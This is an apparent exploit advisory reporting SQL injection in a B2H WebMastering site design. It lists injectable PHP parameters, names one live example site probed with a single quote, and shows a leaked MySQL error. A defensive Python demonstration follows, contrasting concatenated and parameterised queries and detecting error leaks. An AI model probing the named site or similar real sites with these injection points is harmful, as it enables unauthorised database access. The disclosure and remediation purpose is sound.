###################################################################
# Exploit Title : Original WebDesign By B2H WebMastering Marco R. Capelli SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 11/10/2019
# Vendor Homepage : braintohand.com - martiria.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
###################################################################
# Impact :
***********
B2H Marco R. Capelli is prone to an SQL-injection vulnerability because it fails to sufficiently
sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
application and execute arbitrary SQL commands in the application's database. Further exploitation
of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this
issue using a browser or any SQL injection tool.
###################################################################
# SQL Injection Exploit :
**********************
/NEWS/SHOWRAC.PHP?ID=[SQL Injection]
/concorsiesegnalazioni/REGIONE.PHP?REG=[SQL Injection]
/concorsiesegnalazioni/libronews.php?ID=[SQL Injection]
###################################################################
# Example Vulnerable Sites :
*************************
[+] progettobabele.it/concorsiesegnalazioni/REGIONE.PHP?REG=1%27
###################################################################
# Example SQL Database Error :
****************************
Errore:You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax
to use near ''1'') ORDER BY `SCAD` ASC' at line 1
###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################
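As an added illustration from a defender's side (example code written for this page, not the advisory's or the vendor's code), the Python script below reconstructs the defect the advisory describes and its fix. The query shape `IN ('...') ORDER BY scad ASC` is inferred from the quoted MySQL error; the table name `concorsi`, the columns other than `SCAD`, and the sample rows are constructed assumptions, and SQLite stands in for MySQL, so the error text on the vulnerable path differs from the one quoted above. The script also includes a small check that flags a response body or log line echoing the MySQL syntax-error message, which is the symptom shown under "Example SQL Database Error".

```python
import re
import sqlite3

# Constructed stand-in for the application's contest table. Only the column
# SCAD is taken from the advisory's quoted MySQL error; the table name and the
# other columns are assumptions made for this example.
SCHEMA = """
CREATE TABLE concorsi (
    id     INTEGER PRIMARY KEY,
    reg    TEXT NOT NULL,
    titolo TEXT NOT NULL,
    scad   TEXT NOT NULL
);
"""
# Constructed sample rows (ISO dates so that ORDER BY scad sorts correctly).
ROWS = [
    (1, "1", "Concorso A", "2019-11-30"),
    (2, "1", "Concorso B", "2019-10-15"),
    (3, "2", "Concorso C", "2019-12-01"),
]


def make_db():
    """Builds the in-memory database used by both lookups below."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO concorsi VALUES (?, ?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, reg):
    """The defect the advisory describes: the REG parameter is pasted into
    the SQL text, so a quote in the input becomes SQL syntax. The query
    shape (IN ('...') ORDER BY scad ASC) is inferred from the quoted error."""
    sql = "SELECT titolo FROM concorsi WHERE reg IN ('" + reg + "') ORDER BY scad ASC"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, reg):
    """Same query with a bound parameter: the input is only ever data."""
    sql = "SELECT titolo FROM concorsi WHERE reg IN (?) ORDER BY scad ASC"
    return [row[0] for row in conn.execute(sql, (reg,))]


def probe(lookup, reg):
    """Runs one lookup against a fresh database and reports either
    ("ok", rows) or ("error", message) so the two versions can be compared."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, reg))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


# Signature of the database error the advisory shows being echoed to the
# client; a response body or application log line matching it means the
# backend is surfacing raw SQL errors to users.
MYSQL_SYNTAX_ERROR = re.compile(r"You have an error in your SQL syntax", re.IGNORECASE)


def leaks_sql_error(text):
    """True if a response body / log line contains the MySQL syntax-error text."""
    return bool(MYSQL_SYNTAX_ERROR.search(text))


if __name__ == "__main__":
    # The advisory's probe value: a single quote appended to the parameter.
    for reg in ("1", "1'"):
        print(repr(reg), "vulnerable:", probe(vulnerable_lookup, reg))
        print(repr(reg), "safe:      ", probe(safe_lookup, reg))
    # Constructed sample of the response body shown in the advisory.
    body = ("Errore:You have an error in your SQL syntax; check the manual "
            "that corresponds to your MySQL server version")
    print("error leaked:", leaks_sql_error(body))
```

With the ordinary value `1` both lookups return the same rows; with the advisory's `1'` the concatenated query fails to parse while the parameterised query simply returns no rows. The `leaks_sql_error` check is the kind of signature a WAF, proxy or log pipeline can alert on, since a production page should never return a database error verbatim.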